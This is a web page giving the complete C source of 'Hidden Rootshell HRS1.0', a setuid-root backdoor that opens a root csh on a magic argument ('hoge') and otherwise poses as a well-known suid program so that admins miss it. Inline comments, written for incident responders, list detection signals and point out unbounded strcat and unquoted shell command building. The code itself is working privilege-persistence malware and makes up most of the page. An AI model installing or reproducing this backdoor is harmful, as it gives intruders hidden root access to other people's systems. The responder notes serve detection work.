This is a rootshell program. It acts as a root shell if you pass it the special argument. If the special argument is not given, it calls a specified program instead. So if you give this program the name of a well-known suid program, it is very difficult for admins to find.
ba06871c2d769a971556d49a3506b1b662ad02c2bd398bf1eee677942ec8d211
/*=======================================================
Hidden Rootshell - HRS1.0 Programmed by UNYUN
http://shadowpenguin.backsection.net
=======================================================
*/
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
/* Trigger string: main() compares argv[1] against this with strcmp(). It is
   stored as a plain literal, so it is visible in the compiled binary's strings. */
#define MAGIC "hoge"
/* Path that main() executes when the trigger is absent, and whose mode it
   toggles with chmod. Presumably the displaced genuine program is kept here
   (per the description at the top of the page) -- a dot-file directly under
   "/" is itself something to look for during triage. */
#define ORIGINAL "/.desktop-user"
/*
 * Wrapper entry point (K&R-style definition, implicit int, no return value).
 *
 * Behaviour visible in this listing:
 *   - sets uid and gid to 0 unconditionally;
 *   - if exactly one argument is given and it equals MAGIC, runs /usr/bin/csh;
 *   - otherwise sets ORIGINAL to mode 4755, runs ORIGINAL with the caller's
 *     arguments appended, so the invocation looks like the wrapped program;
 *   - in both cases sets ORIGINAL back to mode 644 before falling off the end.
 *
 * Notes for responders:
 *   - ORIGINAL carries the setuid bit only while it is being run, so a scan
 *     for setuid files at rest would list this wrapper (under whatever name
 *     it was installed as) and not ORIGINAL. Comparing setuid binaries against
 *     a trusted baseline or the vendor package is what exposes the swap.
 *   - Every call goes through system(), i.e. a shell is spawned to run
 *     "chmod 4755 ...", ORIGINAL, and "chmod 644 ..."; process auditing on a
 *     setuid program spawning those commands is a usable signal.
 *   - The literals "chmod 4755 %s", "chmod 644 %s", "/usr/bin/csh" and the
 *     ORIGINAL path are all present as strings in the binary.
 */
main(argc,argv)
int argc;
char *argv[];
{
int i;
/* Fixed-size command buffer; nothing below checks lengths against it. */
char buffer[2000];
/* Return values are not checked. These calls can only succeed if the file is
   installed setuid-root, as the page's description implies. */
setuid(0); setgid(0);
/* Trigger path: exactly one argument, equal to MAGIC. */
if (argc==2 && strcmp(argv[1],MAGIC)==0){
system("/usr/bin/csh");
}else{
/* Pass-through path: give ORIGINAL the setuid bit for the duration of the call. */
sprintf(buffer,"chmod 4755 %s",ORIGINAL); system(buffer);
/* Rebuild the command line as ORIGINAL followed by argv[1..argc-1], separated
   by single spaces. The arguments are appended with unbounded strcat() and
   without quoting, and the result is interpreted by the shell that system()
   starts after the uid change above. */
strcpy(buffer,ORIGINAL);
for (i=0;i<argc-1;i++){
strcat(buffer," ");
strcat(buffer,argv[i+1]);
}
system(buffer);
}
/* Runs after either branch: drop ORIGINAL back to 644 so it has no setuid bit
   at rest. Each chmod changes the file's mode, so its ctime should move on
   every invocation of the wrapper. */
sprintf(buffer,"chmod 644 %s",ORIGINAL); system(buffer);
}